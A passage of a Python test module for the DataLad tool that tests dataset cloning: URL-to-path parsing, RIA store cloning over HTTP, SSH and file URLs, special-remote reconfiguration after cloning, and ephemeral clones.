If we can write (strangely\n # mounted/crippled file system, subsequent assumptions are violated\n # and we can stop\n probe = Path('probe')\n try:\n probe.write_text('should not work')\n raise SkipTest\n except PermissionError:\n # we are indeed in a read-only situation\n pass\n res = clone('///', result_xfm=None, return_type='list', on_failure='ignore')\n assert_status('error', res)\n assert_result_count(\n res, 1, status='error',\n message=\"could not create work tree dir '%s/%s': Permission denied\"\n % (pdir, get_datasets_topdir())\n )\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_autoenabled_remote_msg(path=None):\n # Verify that no message about a remote not been enabled is displayed\n # whenever the remote we clone is the type=git special remote, so the name\n # of the remote might not match\n with swallow_logs(new_level=logging.INFO) as cml:\n res = clone('///repronim/containers', path, result_xfm=None, return_type='list')\n assert_status('ok', res)\n assert_not_in(\"not auto-enabled\", cml.out)\n\n\n@with_sameas_remote(autoenabled=True)\n@with_tempfile(mkdir=True)\ndef test_clone_autoenable_msg_handles_sameas(repo=None, clone_path=None):\n ds = Dataset(repo.path)\n with swallow_logs(new_level=logging.INFO) as cml:\n res = clone(ds, clone_path, result_xfm=None, return_type='list')\n assert_status('ok', res)\n assert_in(\"r_dir\", cml.out)\n assert_in(\"not auto-enabled\", cml.out)\n # The rsyncurl remote was enabled.\n assert_not_in(\"r_rsync\", cml.out)\n ds_cloned = Dataset(clone_path)\n remotes = ds_cloned.repo.get_remotes()\n assert_in(\"r_rsync\", remotes)\n assert_not_in(\"r_dir\", remotes)\n\n\ndef test_installationpath_from_url():\n # cases for all OSes\n cases = [\n 'http://example.com/lastbit',\n 'http://example.com/lastbit.git',\n 'http://lastbit:8000',\n # SSH\n 'hostname:lastbit',\n 'hostname:lastbit/',\n 'hostname:subd/lastbit',\n 'hostname:/full/path/lastbit',\n 'hostname:lastbit/.git',\n 'hostname:lastbit/.git/',\n 'hostname:/full/path/lastbit/.git',\n 'full.hostname.com:lastbit/.git',\n '[email protected]:lastbit/.git',\n 'ssh://user:[email protected]/full/path/lastbit',\n 'ssh://user:[email protected]/full/path/lastbit/',\n 'ssh://user:[email protected]/full/path/lastbit/.git',\n ]\n # OS specific cases\n cases += [\n 'C:\\\\Users\\\\mih\\\\AppData\\\\Local\\\\Temp\\\\lastbit',\n 'C:\\\\Users\\\\mih\\\\AppData\\\\Local\\\\Temp\\\\lastbit\\\\',\n 'Temp\\\\lastbit',\n 'Temp\\\\lastbit\\\\',\n 'lastbit.git',\n 'lastbit.git\\\\',\n ] if on_windows else [\n 'lastbit',\n 'lastbit/',\n '/lastbit',\n 'lastbit.git',\n 'lastbit.git/',\n ]\n\n for p in cases:\n eq_(_get_installationpath_from_url(p), 'lastbit')\n # we need to deal with quoted urls\n for url in (\n # although some docs say that space could've been replaced with +\n 'http://localhost:8000/+last%20bit',\n 'http://localhost:8000/%2Blast%20bit',\n '///%2Blast%20bit',\n '///d1/%2Blast%20bit',\n '///d1/+last bit',\n ):\n eq_(_get_installationpath_from_url(url), '+last bit')\n # and the hostname alone\n eq_(_get_installationpath_from_url(\"http://hostname\"), 'hostname')\n eq_(_get_installationpath_from_url(\"http://hostname/\"), 'hostname')\n\n\n# https://github.com/datalad/datalad/issues/3958\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_expanduser(srcpath=None, destpath=None):\n src = Dataset(Path(srcpath) / 'src').create()\n dest = Dataset(Path(destpath) / 'dest').create()\n\n # We switch away from home set up in datalad.setup_package(), so make sure\n # we have a valid identity.\n with 
open(op.join(srcpath, \".gitconfig\"), \"w\") as fh:\n fh.write(\"[user]\\n\"\n \"name = DataLad oooooTester\\n\"\n \"email = [email protected]\\n\")\n\n with chpwd(destpath), patch.dict('os.environ', get_home_envvars(srcpath)):\n res = clone(op.join('~', 'src'), 'dest', result_xfm=None, return_type='list',\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='install', status='error', path=dest.path,\n message='target path already exists and not empty, refuse to '\n 'clone into target path')\n # wipe out destination, and try again\n assert_status('ok', remove(dataset=dest, reckless='kill'))\n # now it should do it, and clone the right one\n cloneds = clone(op.join('~', 'src'), 'dest')\n eq_(cloneds.pathobj, Path(destpath) / 'dest')\n eq_(src.id, cloneds.id)\n # and it shouldn't fail when doing it again, because it detects\n # the re-clone\n cloneds = clone(op.join('~', 'src'), 'dest')\n eq_(cloneds.pathobj, Path(destpath) / 'dest')\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_originorigin(path=None):\n path = Path(path)\n origin = Dataset(path / 'origin').create()\n (origin.pathobj / 'file1.txt').write_text('content')\n origin.save()\n clone_lev1 = clone(origin, path / 'clone_lev1')\n clone_lev2 = clone(clone_lev1, path / 'clone_lev2')\n # the goal is to be able to get file content from origin without\n # the need to configure it manually\n assert_result_count(\n clone_lev2.get('file1.txt', on_failure='ignore'),\n 1,\n action='get',\n status='ok',\n path=str(clone_lev2.pathobj / 'file1.txt'),\n )\n eq_((clone_lev2.pathobj / 'file1.txt').read_text(), 'content')\n eq_(\n Path(clone_lev2.siblings(\n 'query',\n name=DEFAULT_REMOTE + '-2',\n return_type='item-or-list')['url']),\n origin.pathobj\n )\n\n # Clone another level, this time with a relative path. 
Drop content from\n # lev2 so that origin is the only place that the file is available from.\n clone_lev2.drop(\"file1.txt\")\n with chpwd(path), swallow_logs(new_level=logging.DEBUG) as cml:\n clone_lev3 = clone('clone_lev2', 'clone_lev3')\n # we called git-annex-init; see gh-4367:\n cml.assert_logged(msg=r\"[^[]*Run \\[('git',.*'annex'|'git-annex'), 'init'\",\n match=False,\n level='DEBUG')\n assert_result_count(\n clone_lev3.get('file1.txt', on_failure='ignore'),\n 1,\n action='get',\n status='ok',\n path=str(clone_lev3.pathobj / 'file1.txt'))\n\n\n# test fix for gh-2601/gh-3538\n@with_tempfile()\ndef test_relative_submodule_url(path=None):\n Dataset(op.join(path, 'origin')).create()\n ds = Dataset(op.join(path, 'ds')).create()\n with chpwd(ds.path):\n ds_cloned = ds.clone(\n source=op.join(op.pardir, 'origin'),\n path='sources')\n\n # Check that a simple fetch call does not fail.\n ds_cloned.repo.fetch()\n\n subinfo = ds.subdatasets(return_type='item-or-list')\n eq_(subinfo['gitmodule_url'],\n # must be a relative URL, not platform-specific relpath!\n '../../origin')\n\n\n@with_tree(tree={\"subdir\": {}})\n@with_tempfile(mkdir=True)\ndef test_local_url_with_fetch(path=None, path_other=None):\n path = Path(path)\n path_other = Path(path_other)\n Dataset(path / \"source\").create()\n\n for where, source, path in [\n (path, \"source\", \"a\"),\n (path / \"subdir\", op.join(op.pardir, \"source\"), \"a\"),\n (path, \"source\", path_other / \"a\")]:\n with chpwd(where):\n ds_cloned = clone(source=source, path=path)\n # Perform a fetch to check that the URL points to a valid location.\n ds_cloned.repo.fetch()\n\n\ndef test_decode_source_spec():\n # resolves datalad RIs:\n eq_(decode_source_spec('///subds'),\n dict(source='///subds', giturl=consts.DATASETS_TOPURL + 'subds', version=None,\n type='dataladri', default_destpath='subds'))\n assert_raises(NotImplementedError, decode_source_spec,\n '//custom/subds')\n\n # doesn't harm others:\n for url in (\n 'http://example.com',\n '/absolute/path',\n 'file://localhost/some',\n 'localhost/another/path',\n '[email protected]/mydir',\n 'ssh://somewhe.re/else',\n 'https://github.com/datalad/testrepo--basic--r1',\n ):\n props = decode_source_spec(url)\n dest = props.pop('default_destpath')\n eq_(props, dict(source=url, version=None, giturl=url, type='giturl'))\n\n # RIA URIs with and without version specification\n dsid = '6d69ca68-7e85-11e6-904c-002590f97d84'\n for proto, loc, version in (\n ('http', 'example.com', None),\n ('http', 'example.com', 'v1.0'),\n ('http', 'example.com', 'some_with@in_it'),\n ('ssh', 'example.com', 'some_with@in_it'),\n ):\n spec = 'ria+{}://{}{}{}'.format(\n proto,\n loc,\n '#{}'.format(dsid),\n '@{}'.format(version) if version else '')\n eq_(decode_source_spec(spec),\n dict(\n source=spec,\n giturl='{}://{}/{}/{}'.format(\n proto,\n loc,\n dsid[:3],\n dsid[3:]),\n version=version,\n default_destpath=dsid,\n type='ria')\n )\n # not a dataset UUID\n assert_raises(ValueError, decode_source_spec, 'ria+http://example.com#123')\n\n # literal dataset name/location\n eq_(decode_source_spec('ria+http://example.com#~rootds'),\n {'source': 'ria+http://example.com#~rootds',\n 'version': None, 'type': 'ria',\n 'giturl': 'http://example.com/alias/rootds',\n 'default_destpath': 'rootds'})\n # version etc still works\n eq_(decode_source_spec('ria+http://example.com#~rootds@specialbranch'),\n {'source': 'ria+http://example.com#~rootds@specialbranch',\n 'version': 'specialbranch', 'type': 'ria',\n 'giturl': 
'http://example.com/alias/rootds',\n 'default_destpath': 'rootds'})\n\n\ndef _move2store(storepath, d):\n # make a bare clone of it into a local that matches the organization\n # of a ria dataset store\n store_loc = str(storepath / d.id[:3] / d.id[3:])\n d.repo.call_git(['clone', '--bare', d.path, store_loc])\n d.siblings('configure', name='store', url=str(store_loc),\n result_renderer='disabled')\n Runner(cwd=store_loc).run(['git', 'update-server-info'])\n\n\n@slow # 12sec on Yarik's laptop\n@with_tree(tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {\n 'subds': {'testsub.txt': 'somemore'},\n },\n },\n})\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_ria_http(lcl=None, storepath=None, url=None):\n # create a local dataset with a subdataset\n lcl = Path(lcl)\n storepath = Path(storepath)\n subds = Dataset(lcl / 'ds' / 'subdir' / 'subds').create(force=True)\n subds.save()\n ds = Dataset(lcl / 'ds').create(force=True)\n ds.save(version_tag='original')\n assert_repo_status(ds.path)\n for d in (ds, subds):\n _move2store(storepath, d)\n # location of superds in store\n storeds_loc = str(storepath / ds.id[:3] / ds.id[3:])\n # now we should be able to clone from a ria+http url\n # the super\n riaclone = clone(\n 'ria+{}#{}'.format(url, ds.id),\n lcl / 'clone',\n )\n\n # due to default configuration, clone() should automatically look for the\n # subdataset in the store, too -- if not the following would fail, because\n # we never configured a proper submodule URL\n riaclonesub = riaclone.get(\n op.join('subdir', 'subds'), get_data=False,\n result_xfm='datasets', return_type='item-or-list')\n\n # both datasets came from the store and must be set up in an identical\n # fashion\n for origds, cloneds in ((ds, riaclone), (subds, riaclonesub)):\n eq_(origds.id, cloneds.id)\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origds.repo.get_hexsha(), cloneds.repo.get_hexsha())\n ok_(cloneds.config.get(f'remote.{DEFAULT_REMOTE}.url').startswith(url))\n eq_(cloneds.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore'), 'true')\n eq_(cloneds.config.get('datalad.get.subdataset-source-candidate-200origin'),\n 'ria+%s#{id}' % url)\n\n # now advance the source dataset\n (ds.pathobj / 'newfile.txt').write_text('new')\n ds.save()\n ds.push(to='store')\n Runner(cwd=storeds_loc).run(['git', 'update-server-info'])\n # re-clone as before\n riaclone2 = clone(\n 'ria+{}#{}'.format(url, ds.id),\n lcl / 'clone2',\n )\n # and now clone a specific version, here given be the tag name\n riaclone_orig = clone(\n 'ria+{}#{}@{}'.format(url, ds.id, 'original'),\n lcl / 'clone_orig',\n )\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n # we got the precise version we wanted\n eq_(riaclone.repo.get_hexsha(), riaclone_orig.repo.get_hexsha())\n # and not the latest\n eq_(riaclone2.repo.get_hexsha(), ds.repo.get_hexsha())\n neq_(riaclone2.repo.get_hexsha(), riaclone_orig.repo.get_hexsha())\n\n # attempt to clone a version that doesn't exist\n with swallow_logs():\n with assert_raises(IncompleteResultsError) as cme:\n clone('ria+{}#{}@impossible'.format(url, ds.id),\n lcl / 'clone_failed')\n assert_in(\"not found in upstream\", str(cme.value))\n\n # lastly test if URL rewriting is in effect\n # on the surface we clone from an SSH source identified by some custom\n # label, no full URL, but URL rewriting setup maps it back to the\n # HTTP URL used above\n with patch_config({\n 'url.ria+{}#.insteadof'.format(url): 'ria+ssh://somelabel#'}):\n 
cloned_by_label = clone(\n 'ria+ssh://somelabel#{}'.format(origds.id),\n lcl / 'cloned_by_label',\n )\n # so we get the same setup as above, but....\n eq_(origds.id, cloned_by_label.id)\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origds.repo.get_hexsha(), cloned_by_label.repo.get_hexsha())\n ok_(cloned_by_label.config.get(\n f'remote.{DEFAULT_REMOTE}.url').startswith(url))\n eq_(cloned_by_label.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore'),\n 'true')\n # ... the clone candidates go with the label-based URL such that\n # future get() requests acknowledge a (system-wide) configuration\n # update\n eq_(cloned_by_label.config.get('datalad.get.subdataset-source-candidate-200origin'),\n 'ria+ssh://somelabel#{id}')\n\n if not has_symlink_capability():\n return\n # place a symlink in the store to serve as a dataset alias\n (storepath / 'alias').mkdir()\n (storepath / 'alias' / 'myname').symlink_to(storeds_loc)\n with chpwd(lcl):\n cloned_by_alias = clone('ria+{}#~{}'.format(url, 'myname'))\n # still get the same data\n eq_(cloned_by_alias.id, ds.id)\n # more sensible default install path\n eq_(cloned_by_alias.pathobj.name, 'myname')\n\n\n@with_tempfile\n@with_tempfile\ndef _test_ria_postclonecfg(url, dsid, clone_path, superds):\n # Test cloning from RIA store while ORA special remote autoenabling failed\n # due to an invalid URL from the POV of the cloner.\n # Origin's git-config-file should contain the UUID to enable. This needs to\n # work via HTTP, SSH and local cloning.\n\n # Autoenabling should fail initially by git-annex-init and we would report\n # on INFO level. Only postclone routine would deal with it.\n with swallow_logs(new_level=logging.INFO) as cml:\n # First, the super ds:\n riaclone = clone('ria+{}#{}'.format(url, dsid), clone_path)\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n\n # However, we now can retrieve content since clone should have enabled the\n # special remote with new URL (or origin in case of HTTP).\n res = riaclone.get('test.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(riaclone.pathobj / 'test.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if url.startswith('http')\n else \"store-storage\"))\n\n # Second ORA remote is enabled and not reconfigured:\n untouched_remote = riaclone.siblings(name='anotherstore-storage',\n return_type='item-or-list')\n assert_not_is_instance(untouched_remote, list)\n untouched_url = riaclone.repo.get_special_remotes()[\n untouched_remote['annex-uuid']]['url']\n ok_(untouched_url.startswith(\"ria+file://\"))\n ok_(not untouched_url.startswith(\"ria+{}\".format(url)))\n\n # publication dependency was set for store-storage but not for\n # anotherstore-storage:\n eq_(riaclone.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"store-storage\")\n\n # same thing for the sub ds (we don't need a store-url and id - get should\n # figure those itself):\n with swallow_logs(new_level=logging.INFO) as cml:\n riaclonesub = riaclone.get(\n op.join('subdir', 'subds'), get_data=False,\n result_xfm='datasets', return_type='item-or-list')\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n res = riaclonesub.get('testsub.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(riaclonesub.pathobj / 'testsub.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if 
url.startswith('http')\n else \"store-storage\"))\n\n # publication dependency was set for store-storage but not for\n # anotherstore-storage:\n eq_(riaclonesub.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"store-storage\")\n\n # finally get the plain git subdataset.\n # Clone should figure to also clone it from a ria+ URL\n # (subdataset-source-candidate), notice that there wasn't an autoenabled ORA\n # remote, but shouldn't stumble upon it, since it's a plain git.\n res = riaclone.get(op.join('subdir', 'subgit', 'testgit.txt'))\n assert_result_count(res, 1, status='ok', type='dataset', action='install')\n assert_result_count(res, 1, status='notneeded', type='file')\n assert_result_count(res, 2)\n # no ORA remote, no publication dependency:\n riaclonesubgit = Dataset(riaclone.pathobj / 'subdir' / 'subgit')\n eq_(riaclonesubgit.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n None)\n\n # Now, test that if cloning into a dataset, ria-URL is preserved and\n # post-clone configuration is triggered again, when we remove the subds and\n # retrieve it again via `get`:\n ds = Dataset(superds).create()\n ria_url = 'ria+{}#{}'.format(url, dsid)\n ds.clone(ria_url, 'sub')\n sds = ds.subdatasets('sub')\n eq_(len(sds), 1)\n eq_(sds[0]['gitmodule_datalad-url'], ria_url)\n assert_repo_status(ds.path)\n ds.drop('sub', what='all', reckless='kill', recursive=True)\n assert_repo_status(ds.path)\n\n # .gitmodules still there:\n sds = ds.subdatasets('sub')\n eq_(len(sds), 1)\n eq_(sds[0]['gitmodule_datalad-url'], ria_url)\n # get it again:\n\n # Autoenabling should fail initially by git-annex-init and we would report\n # on INFO level. Only postclone routine would deal with it.\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.get('sub', get_data=False)\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n\n subds = Dataset(ds.pathobj / 'sub')\n # special remote is fine:\n res = subds.get('test.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(subds.pathobj / 'test.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if url.startswith('http')\n else \"store-storage\"))\n\n\n@with_tempfile\ndef _postclonetest_prepare(lcl, storepath, storepath2, link):\n\n from datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n )\n from datalad.distributed.ora_remote import LocalIO\n\n create_tree(lcl,\n tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {\n 'subds': {'testsub.txt': 'somemore'},\n 'subgit': {'testgit.txt': 'even more'}\n },\n },\n })\n\n lcl = Path(lcl)\n storepath = Path(storepath)\n storepath2 = Path(storepath2)\n link = Path(link)\n link.symlink_to(storepath)\n\n # create a local dataset with a subdataset\n subds = Dataset(lcl / 'ds' / 'subdir' / 'subds').create(force=True)\n subds.save()\n # add a plain git dataset as well\n subgit = Dataset(lcl / 'ds' / 'subdir' / 'subgit').create(force=True,\n annex=False)\n subgit.save()\n ds = Dataset(lcl / 'ds').create(force=True)\n ds.save(version_tag='original')\n assert_repo_status(ds.path)\n\n io = LocalIO()\n\n # Have a second store with valid ORA remote. This should not interfere with\n # reconfiguration of the first one, when that second store is not the one we\n # clone from. 
However, don't push data into it for easier get-based testing\n # later on.\n # Doing this first, so datasets in \"first\"/primary store know about this.\n create_store(io, storepath2, '1')\n url2 = \"ria+{}\".format(get_local_file_url(str(storepath2)))\n for d in (ds, subds, subgit):\n create_ds_in_store(io, storepath2, d.id, '2', '1')\n d.create_sibling_ria(url2, \"anotherstore\", new_store_ok=True)\n d.push('.', to='anotherstore', data='nothing')\n store2_loc, _, _ = get_layout_locations(1, storepath2, d.id)\n Runner(cwd=str(store2_loc)).run(['git', 'update-server-info'])\n\n # Now the store to clone from:\n create_store(io, storepath, '1')\n\n # URL to use for upload. Point is, that this should be invalid for the clone\n # so that autoenable would fail. Therefore let it be based on a to be\n # deleted symlink\n upl_url = \"ria+{}\".format(get_local_file_url(str(link)))\n\n for d in (ds, subds, subgit):\n\n # TODO: create-sibling-ria required for config! => adapt to RF'd\n # creation (missed on rebase?)\n create_ds_in_store(io, storepath, d.id, '2', '1')\n d.create_sibling_ria(upl_url, \"store\", new_store_ok=True)\n\n if d is not subgit:\n # Now, simulate the problem by reconfiguring the special remote to\n # not be autoenabled.\n # Note, however, that the actual intention is a URL, that isn't\n # valid from the point of view of the clone (doesn't resolve, no\n # credentials, etc.) and therefore autoenabling on git-annex-init\n # when datalad-cloning would fail to succeed.\n Runner(cwd=d.path).run(['git', 'annex', 'enableremote',\n 'store-storage',\n 'autoenable=false'])\n d.push('.', to='store')\n store_loc, _, _ = get_layout_locations(1, storepath, d.id)\n Runner(cwd=str(store_loc)).run(['git', 'update-server-info'])\n\n link.unlink()\n # We should now have a store with datasets that have an autoenabled ORA\n # remote relying on an inaccessible URL.\n # datalad-clone is supposed to reconfigure based on the URL we cloned from.\n # Test this feature for cloning via HTTP, SSH and FILE URLs.\n\n return ds.id\n\n\n# TODO?: make parametric again on _test_ria_postclonecfg\n@known_failure_windows # https://github.com/datalad/datalad/issues/5134\n@slow # 14 sec on travis\ndef test_ria_postclonecfg():\n\n if not has_symlink_capability():\n # This is needed to create an ORA remote using an URL for upload,\n # that is then invalidated later on (delete the symlink it's based on).\n raise SkipTest(\"Can't create symlinks\")\n\n from datalad.utils import make_tempfile\n\n with make_tempfile(mkdir=True) as lcl, make_tempfile(mkdir=True) as store, \\\n make_tempfile(mkdir=True) as store2:\n id = _postclonetest_prepare(lcl, store, store2)\n\n # test cloning via ria+file://\n _test_ria_postclonecfg(\n get_local_file_url(store, compatibility='git'), id\n )\n\n # Note: HTTP disabled for now. Requires proper implementation in ORA\n # remote. 
See\n # https://github.com/datalad/datalad/pull/4203#discussion_r410284649\n\n # # test cloning via ria+http://\n # with HTTPPath(store) as url:\n # yield _test_ria_postclonecfg, url, id\n\n # test cloning via ria+ssh://\n skip_ssh(_test_ria_postclonecfg)(\n \"ssh://datalad-test:{}\".format(Path(store).as_posix()), id\n )\n\n\n@known_failure_windows\n@skip_ssh\n@with_tree(tree={'somefile.txt': 'some content'})\n@with_tempfile\n@with_tempfile\ndef test_no_ria_postclonecfg(dspath=None, storepath=None, clonepath=None):\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n clonepath = Path(clonepath)\n\n # Test that particular configuration(s) do NOT lead to a reconfiguration\n # upon clone. (See gh-5628)\n\n from datalad.customremotes.ria_utils import create_store\n from datalad.distributed.ora_remote import LocalIO\n\n ds = Dataset(dspath).create(force=True)\n ds.save()\n assert_repo_status(ds.path)\n\n io = LocalIO()\n create_store(io, storepath, '1')\n file_url = \"ria+{}\".format(get_local_file_url(str(storepath)))\n ssh_url = \"ria+ssh://datalad-test:{}\".format(storepath.as_posix())\n ds.create_sibling_ria(file_url, \"teststore\",\n push_url=ssh_url, alias=\"testds\",\n new_store_ok=True)\n ds.push('.', to='teststore')\n\n # Now clone via SSH. Should not reconfigure although `url` doesn't match the\n # URL we cloned from. However, `push-url` does.\n riaclone = clone('{}#{}'.format(ssh_url, ds.id), clonepath)\n\n # ORA remote is enabled (since URL still valid) but not reconfigured:\n untouched_remote = riaclone.siblings(name='teststore-storage',\n return_type='item-or-list')\n assert_not_is_instance(untouched_remote, list)\n ora_cfg = riaclone.repo.get_special_remotes()[\n untouched_remote['annex-uuid']]\n ok_(ora_cfg['url'] == file_url)\n ok_(ora_cfg['push-url'] == ssh_url)\n\n # publication dependency was still set (and it's the only one that was set):\n eq_(riaclone.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"teststore-storage\")\n\n # we can still get the content\n ds.get(\"somefile.txt\")\n\n\n# fatal: Could not read from remote repository.\n@known_failure_githubci_win # in datalad/git-annex as e.g. 
of 20201218\n@with_tempfile(mkdir=True)\n@with_tempfile\n@with_tempfile\ndef test_ria_postclone_noannex(dspath=None, storepath=None, clonepath=None):\n\n # Test for gh-5186: Cloning from local FS, shouldn't lead to annex\n # initializing origin.\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n clonepath = Path(clonepath)\n\n from datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n )\n from datalad.distributed.ora_remote import LocalIO\n\n # First create a dataset in a RIA store the standard way\n somefile = dspath / 'a_file.txt'\n somefile.write_text('irrelevant')\n ds = Dataset(dspath).create(force=True)\n\n io = LocalIO()\n create_store(io, storepath, '1')\n lcl_url = \"ria+{}\".format(get_local_file_url(str(storepath)))\n create_ds_in_store(io, storepath, ds.id, '2', '1')\n ds.create_sibling_ria(lcl_url, \"store\", new_store_ok=True)\n ds.push('.', to='store')\n\n\n # now, remove annex/ tree from store in order to see, that clone\n # doesn't cause annex to recreate it.\n store_loc, _, _ = get_layout_locations(1, storepath, ds.id)\n annex = store_loc / 'annex'\n rmtree(str(annex))\n assert_false(annex.exists())\n\n clone_url = get_local_file_url(str(storepath), compatibility='git') + \\\n '#{}'.format(ds.id)\n clone(\"ria+{}\".format(clone_url), clonepath)\n\n # no need to test the cloning itself - we do that over and over in here\n\n # bare repo in store still has no local annex:\n assert_false(annex.exists())\n\n\n@slow # 17sec on Yarik's laptop\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_inherit_src_candidates(lcl=None, storepath=None, url=None):\n lcl = Path(lcl)\n storepath = Path(storepath)\n # dataset with a subdataset\n ds1 = Dataset(lcl / 'ds1').create()\n ds1sub = ds1.create('sub')\n # a different dataset into which we install ds1, but do not touch its subds\n ds2 = Dataset(lcl / 'ds2').create()\n ds2.clone(source=ds1.path, path='mysub')\n\n # we give no dataset a source candidate config!\n # move all dataset into the store\n for d in (ds1, ds1sub, ds2):\n _move2store(storepath, d)\n\n # now we must be able to obtain all three datasets from the store\n riaclone = clone(\n 'ria+{}#{}'.format(\n # store URL\n url,\n # ID of the root dataset\n ds2.id),\n lcl / 'clone',\n )\n # what happens is the the initial clone call sets a source candidate\n # config, because it sees the dataset coming from a store\n # all obtained subdatasets get the config inherited on-clone\n datasets = riaclone.get('.', get_data=False, recursive=True, result_xfm='datasets')\n # we get two subdatasets\n eq_(len(datasets), 2)\n for ds in datasets:\n eq_(ConfigManager(dataset=ds, source='branch-local').get(\n 'datalad.get.subdataset-source-candidate-200origin'),\n 'ria+%s#{id}' % url)\n\n\n@skip_if_no_network\n@with_tempfile()\ndef test_ria_http_storedataladorg(path=None):\n # can we clone from the store w/o any dedicated config\n ds = clone('ria+http://store.datalad.org#{}'.format(datalad_store_testds_id), path)\n ok_(ds.is_installed())\n eq_(ds.id, datalad_store_testds_id)\n\n\n@skip_if_on_windows # see gh-4131\n# Ephemeral clones cannot use adjusted mode repos\n@skip_if_adjusted_branch\n@with_tree(tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {'testsub.txt': 'somemore'},\n },\n})\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_ephemeral(origin_path=None, bare_path=None,\n clone1_path=None, clone2_path=None,\n clone3_path=None, clone4_path=None):\n 
can_symlink = has_symlink_capability()\n\n file_test = Path('ds') / 'test.txt'\n file_testsub = Path('ds') / 'subdir' / 'testsub.txt'\n\n origin = Dataset(origin_path).create(force=True)\n origin.save()\n\n def check_clone(clone_):\n # common checks to do on a clone\n eq_(clone_.config.get(\"annex.private\"), \"true\")\n if can_symlink:\n clone_annex = (clone_.repo.dot_git / 'annex')\n ok_(clone_annex.is_symlink())\n ok_(clone_annex.resolve().samefile(origin.repo.dot_git / 'annex'))\n if not clone_.repo.is_managed_branch():\n # TODO: We can't properly handle adjusted branch yet\n eq_((clone_.pathobj / file_test).read_text(), 'some')\n eq_((clone_.pathobj / file_testsub).read_text(), 'somemore')\n\n # 1. clone via path\n clone1 = clone(origin_path, clone1_path, reckless='ephemeral')\n check_clone(clone1)\n\n # 2. clone via file-scheme URL\n clone2 = clone('file://' + Path(origin_path).as_posix(), clone2_path,\n reckless='ephemeral')\n check_clone(clone2)\n\n # 3. add something to clone1 and push back to origin availability from\n # clone1 should not be propagated (we declared 'here' dead to that end)\n\n (clone1.pathobj / 'addition.txt').write_text(\"even more\")\n clone1.save()\n origin.config.set(\"receive.denyCurrentBranch\", \"updateInstead\",\n scope=\"local\")\n # Note, that the only thing to test is git-annex-dead here,\n # if we couldn't symlink:\n clone1.push(to=DEFAULT_REMOTE, data='nothing' if can_symlink else 'auto')\n\n if external_versions['cmd:annex'] >= \"8.20210428\":\n # ephemeral clones are private (if supported by annex version). Despite\n # the push, clone1's UUID doesn't show up in origin\n recorded_locations = origin.repo.call_git(['cat-file', 'blob',\n 'git-annex:uuid.log'],\n read_only=True)\n assert_not_in(clone1.config.get(\"annex.uuid\"), recorded_locations)\n\n if not origin.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origin.repo.get_hexsha(), clone1.repo.get_hexsha())\n res = origin.repo.whereis(\"addition.txt\")\n if can_symlink:\n # obv. present in origin, but this is not yet known to origin:\n eq_(res, [])\n res = origin.repo.fsck()\n assert_result_count(res, 3, success=True)\n # TODO: Double check whether annex reports POSIX paths o windows!\n eq_({str(file_test), str(file_testsub), \"addition.txt\"},\n {r['file'] for r in res})\n # now origin knows:\n res = origin.repo.whereis(\"addition.txt\")\n eq_(res, [origin.config.get(\"annex.uuid\")])\n\n # 4. ephemeral clone from a bare repo\n runner = GitWitlessRunner()\n runner.run(['git', 'clone', '--bare', origin_path, bare_path])\n runner.run(['git', 'annex', 'init'], cwd=bare_path)\n\n eph_from_bare = clone(bare_path, clone3_path, reckless='ephemeral')\n can_symlink = has_symlink_capability()\n\n if can_symlink:\n # Bare repo uses dirhashlower by default, while a standard repo uses\n # dirhashmixed. Symlinking different object trees doesn't really work.\n # Don't test that here, since this is not a matter of the \"ephemeral\"\n # option alone. We should have such a setup in the RIA tests and test\n # for data access there.\n # Here we only test for the correct linking.\n eph_annex = eph_from_bare.repo.dot_git / 'annex'\n ok_(eph_annex.is_symlink())\n ok_(eph_annex.resolve().samefile(Path(bare_path) / 'annex'))\n\n # 5. 
